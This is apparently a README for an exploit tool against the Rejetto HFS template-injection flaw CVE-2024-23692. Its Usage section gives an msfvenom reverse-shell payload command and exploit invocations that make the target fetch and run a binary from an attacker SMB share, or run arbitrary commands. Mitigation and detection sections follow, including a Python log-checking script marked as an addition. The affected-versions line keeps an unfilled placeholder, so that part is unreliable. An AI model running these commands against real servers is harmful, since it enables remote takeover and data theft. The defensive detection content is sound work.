Rejetto HFS (HTTP File Server) CVE-2024-23692 Vulnerability


Overview

Rejetto HFS (HTTP File Server) is a simple web file server that facilitates file sharing over a network or the internet. Despite its ease of use and simplicity, a critical vulnerability (CVE-2024-23692) has been discovered, making the server a target for attackers.


CVE-2024-23692: Server-Side Template Injection (SSTI) Vulnerability


Description

CVE-2024-23692 is a Server-Side Template Injection (SSTI) vulnerability identified in Rejetto HFS. This vulnerability allows an attacker to inject and execute malicious templates on the server. If exploited, it can lead to remote code execution, potentially compromising the entire server and the data it hosts.


Impact

An attacker exploiting this vulnerability can:

  • Execute arbitrary code on the server
  • Gain unauthorized access to sensitive data
  • Compromise the integrity and availability of the server
  • Use the compromised server to launch further attacks within the network

Usage

Obtain a shell using a malicious binary created with msfvenom.

Note: Leave nc listening.

# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

Run a command remotely.

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

It may take approximately 15 seconds to display the result.

[Screenshot_2.png]


Affected Versions

All versions of Rejetto HFS up to and including version [insert latest vulnerable version here] are affected by this vulnerability.


Mitigation

To mitigate the risk posed by CVE-2024-23692, users are advised to:

  • Update to the latest version: Ensure you are using a version of Rejetto HFS where this vulnerability has been patched. Check the official Rejetto HFS website or repository for the latest updates.
  • Apply Security Best Practices: Restrict access to the HFS server to trusted networks and users only. Use strong authentication and authorization mechanisms.
  • Monitor and Audit: Regularly monitor the server for unusual activity and audit logs for signs of exploitation.

Detection

To determine if your server has been compromised, look for:

  • Unusual network traffic originating from the server
  • Unexpected files or processes on the server
  • Unauthorized changes to server configurations or data
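The "unexpected files or processes" indicator above can be checked mechanically: the behaviour shown in the Usage section is the HFS process launching a binary from a remote share and running a command, so a process-creation log that shows the file server spawning a shell, an enumeration tool, or anything from a UNC path is a strong signal. The script below is an added example, not part of this project; it assumes the HFS binary is named hfs.exe and runs over constructed, Sysmon-style process-creation records embedded inline.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style,
# flattened to one key=value line each). Made-up records, not real logs.
SAMPLE_EVENTS = [
    "ParentImage=C:\\HFS\\hfs.exe|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c systeminfo",
    "ParentImage=C:\\HFS\\hfs.exe|Image=\\\\192.168.198.128\\kali\\exploit.exe|CommandLine=\\\\192.168.198.128\\kali\\exploit.exe",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\HFS\\hfs.exe|CommandLine=hfs.exe",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe",
]

# Assumed name of the HFS process; adjust to the binary name actually deployed.
HFS_IMAGE = "hfs.exe"
# A file server has no legitimate reason to spawn shells or enumeration tools.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "systeminfo.exe", "whoami.exe"}


def parse_event(line):
    """Split a flattened key=value event into a dict with lower-case keys."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event):
    """Return a reason string if the event looks like HFS post-exploitation, else None."""
    if basename(event.get("parentimage", "")) != HFS_IMAGE:
        return None
    image = event.get("image", "")
    if image.startswith("\\\\"):            # child started from a UNC (remote share) path
        return "hfs spawned a binary from a UNC path: " + image
    if basename(image) in SUSPICIOUS_CHILDREN:
        return "hfs spawned a shell/enumeration tool: " + basename(image)
    return None


def find_suspicious(lines):
    """Run every record through classify() and collect the alert reasons, in order."""
    hits = []
    for line in lines:
        reason = classify(parse_event(line))
        if reason:
            hits.append(reason)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

On a real host, feed it the flattened output of your endpoint agent's process-creation events; the two constructed hfs.exe records above correspond to the two actions in the Usage section and are the ones flagged.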

Reporting and Assistance

For further assistance and support, refer to the Rejetto HFS community forums or the official support channels.


Resources


License

This project is licensed under the MIT License - see the LICENSE file for details.